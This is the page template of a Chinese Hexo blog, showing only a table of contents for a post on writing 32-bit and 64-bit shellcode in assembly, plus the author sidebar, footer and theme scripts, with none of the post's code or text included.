          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1%E3%80%81%E4%BB%80%E4%B9%88%E6%98%AFshellcode"><span class="nav-number">1.</span> <span class="nav-text">1、什么是shellcode</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2%E3%80%81%E6%80%8E%E4%B9%88%E7%94%A8%E6%B1%87%E7%BC%96%E8%AF%AD%E8%A8%80%E6%9E%84%E9%80%A0%E7%AE%80%E5%8D%95%E7%9A%84shellcode-64%E4%BD%8D"><span class="nav-number">2.</span> <span class="nav-text">2、怎么用汇编语言构造简单的shellcode(64位)</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3%E3%80%81%E6%80%8E%E4%B9%88%E7%94%A8%E6%B1%87%E7%BC%96%E8%AF%AD%E8%A8%80%E6%9E%84%E9%80%A0%E7%AE%80%E5%8D%95%E7%9A%84shellcode%EF%BC%8832%E4%BD%8D%EF%BC%89"><span class="nav-number">3.</span> <span class="nav-text">3、怎么用汇编语言构造简单的shellcode（32位）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#4%E3%80%81%E6%89%8B%E5%86%99open%EF%BC%8Cread%EF%BC%8Cwrite%E7%9A%84shellcode"><span class="nav-number">4.</span> <span class="nav-text">4、手写open，read，write的shellcode</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#5%E3%80%81%E6%80%8E%E4%B9%88%E5%B0%86%E8%87%AA%E5%B7%B1%E5%86%99%E5%A5%BD%E7%9A%84%E6%B1%87%E7%BC%96%E8%AF%AD%E8%A8%80%E8%BD%AC%E6%8D%A2%E6%88%90%E6%9C%BA%E5%99%A8%E7%A0%81%E3%80%82"><span class="nav-number">5.</span> <span class="nav-text">5、怎么将自己写好的汇编语言转换成机器码。</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="楼上请让路*"
      src="/images/image.png">
  <p class="site-author-name" itemprop="name">楼上请让路*</p>
  <div class="site-description" itemprop="description">楼上请让路*的博客</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">18</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">27</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/polishing-labs" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;polishing-labs" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">楼上请让路*</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
